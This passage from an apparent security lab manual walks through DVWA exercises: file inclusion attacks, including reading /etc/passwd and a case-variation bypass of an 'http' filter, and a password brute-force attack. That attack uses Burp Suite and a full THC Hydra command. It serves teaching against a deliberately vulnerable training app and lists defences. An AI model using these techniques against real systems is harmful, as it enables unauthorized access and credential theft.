starting with the word “file”. If you try anything else, it will show “File not Found”.

In this level of security, we can still gather sensitive info using the “File” URI scheme. (because it
starts with the word “file”)
Change the URL from [Link] to ?page=[Link]

You will get the data of /etc/passwd file.

This is how you can exploit file inclusion vulnerability using local files on the webserver.

75
Remote File Inclusion in Action

Now, let’s try to exploit this vulnerability using remote files hosted on the attacker machine.

Difficulty: LOW
Now, Let’s start with the Low difficulty.
Change the difficulty to low and go to file inclusion tab.
Let’s change [Link] to [Link] so the final URL will look something like
this,
?page=[Link]

76
Difficulty: MEDIUM
Change the difficulty to medium and check as we did it in the low difficulty. You’ll notice, it’s not
working anymore. The target is now filtering “http” and “https” as shown in source page.

so try the attack with “HTTP” (in CAPS) or any one word in caps like I used as shown in snapshot
(httP)and it’ll work. ?page=httP://[Link]

77
Difficulty: HIGH

We can’t exploit the high difficulty using RFI as you can see in source page,we know that the
target web-server is only accepting “[Link]” or anything that’s starting with the word “file”
that’s why we can’t include anything from an outside server. Points to Secure against File Inclusion
Vulnerability a) Strong Input Validation.
b) A whitelist of acceptable inputs.
c) Reject any inputs that do not strictly conform to specifications.
d) For filenames, use stringent whitelist that limits the character set to be used.
e) Exclude directory separators such as “/”.
f) Use a whitelist of allowable file extensions.
g) Environment Hardening.
h) Develop and run your code in the most recent versions of PHP available.
i) Configure your PHP applications so that it does not use register_globals.
j) Run your code using the lowest privileges.
That’s how you exploit and secure against file inclusion vulnerability. There are many other ways
to exploit file inclusion, other than which I mentioned in this post. The exploits I mentioned here
are easy and can be easily performed. If you find some other cool ways to exploit file inclusion,
do share them in comments, I would love to improve myself.

78
 EXPERIMENT- 10
Objective: Brute-Force and Dictionary Attacks: Use DVWA to simulate login
pages and demonstrate brute-force and dictionary attacks against weak passwords.
Emphasize the importance of strong password policies.

Lab requirements

● Kali Linux
● DVWA v1.9 running on a separate machine
This tutorial assumes you have setup the required lab environments to run the penetration test. If
you need help setting up DVWA, check this out. If you need help setting Kali on your VM, here
is a good place to start.

Step 1, recon:

Firstly, we must do our homework and understand what is happening when the user submits a
form. For instance, is it a GET or POST request? Where is the request going to? What data is
being sent?

Luckily for us, Kali comes with a powerful tool called Burp Suite. Burp Suite is a huge tool, and
does a ton of different stuff. For the purpose of this tutorial we’ll just be focusing on how we can
use it for our brute force attack.

Burp Suite is going to act as a proxy server. Essentially, what this means is that we route our
requests through Burp Suite — it sits in the middle. This is an over simplified description, but
you get the idea. If you’re interested in learning more about proxy servers, here is some reading.
HTTP request now:

Our browser -> Target server HTTP request through a proxy:

Our browser -> Proxy server -> Target server
With Burp Suite sitting in the middle, we can intercept the request from our browser before it
reaches the target server. There is a number of reasons why we would want to do this. In the context
of this attack we are doing it so we can inspect the HTTP request. Setting up the proxy server

For this to work we need to point our browser to the proxy server, so all requests go through it.
So, lets do that. Go ahead and open up Burp Suite.

Click Proxy in the top row of tabs, then select Option. You’ll see the proxy server address.

79
Kali’s default installed browser is Ice Weasel. Go ahead and open that up, and we’ll point it to our
Burp Suite proxy server. In the url bar type about:preferences, this will take you to the settings
page. On the left select Advanced, from the tabs on the right select Network. Click Settings and
enter the proxy server address.

80
With our proxy configured, we’re almost good to go. Head to the target page

([Link] and enable the Burp Suite interceptor.

Inspect the login request

With interceptor enabled, any requests made from our browser will be stopped by the proxy server.
Then we can inspect, modify, drop or forward the request.

81
Without entering any credentials, hit the login button and let’s take a look at the request.

You should see this:

There is some key info here:

● Its a GET request

● The login paramaters (username=&password=&Login=Login)
● The cookie (security=low; PHPSESSID=ahs8eugnukjkh9auegathrbfg5) With all
this info, we can recreate the request and use it in our brute force attack.
Step 2, the attack:

Our weapon of choice is THC Hydra. Hydra can perform rapid dictionary attacks against an
authentication service.

Hydra has a bunch of options, to learn more about them just type hydra -h in the terminal for more
info and examples.

Here’s the info we’re going to providing Hydra for our attack:

● target server
● URL path
● username
● password dictionary
● cookie
● failure message
For the username, we’re going to cheat a bit and assume we know the username is admin. You can
also provide Hydra with username dictionary, but for now, we’ll just focus on the password.

The failure message is the response we get from the login form when submit a bad login. It’s just
a string that Hydra searches the response HTML for to see if the login succeeded or failed. For
instance, the message we get in red under the login form after a bad login attempt is “Username
and/or password incorrect.”.

82
The complete command will look like this:

hydra [Link] -l admin -P /usr/share/set/src/fasttrack/[Link] http-get-form

“dvwa/vulnerabilities/brute/[Link]:username=^USER^&password=^PASS^&Login=
Login:Username and/or password incorrect.:H=Cookie:
security=Low;PHPSESSID=eogppved743ckngeo0so6tnp87" In action:

The tutorial for brute forcing on medium and high security will follow soon.

If you got stuck or have any questions, leave a comment, I’ll do my best to get back to you.

83